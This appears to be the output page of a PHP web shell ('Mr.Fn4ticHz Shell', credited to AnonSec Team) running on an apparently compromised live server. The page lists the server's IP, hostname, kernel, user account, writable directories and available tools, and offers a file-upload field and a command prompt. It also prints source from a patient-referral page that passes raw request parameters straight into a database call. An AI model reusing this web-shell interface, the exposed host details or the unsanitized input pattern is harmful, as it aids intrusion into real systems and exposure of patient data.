Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 18.117.99.152
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in//Referred_To.php
<?php session_start();
require_once("../patientmanager.php");
require_once("../DBManager.php");

if(isset($_POST['signup'])) 
{
   PatientManager::transferreferal("$_GET[prescriptionid]","$_GET[patientid]","$_POST[Transfer_IPD]","$_POST[Word]","$_POST[Bed]","$_POST[Referred_To]","$_POST[Name_Hospital]","$_POST[Name_of_Consultant]","$_POST[followup]","$_POST[followup_date]","$_POST[enteredby]");
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
  <title>Document</title>

   </head>
  <body>
          <h3 align='center'>Referred To</h3>
<input type="hidden" name="Referred_To" value='on'>
<div>
<label for="item">Name of Hospital<span>*</span><input name="Name_Hospital" type="text">
</div>
<div> <label for="item">Name of Consultant<span>*</span><input name="Name_of_Consultant" type="text">
</div>

<input type="submit" name="signup" value="Submit">
</form>
</body>
</html> 

Anon7 - 2022
AnonSec Team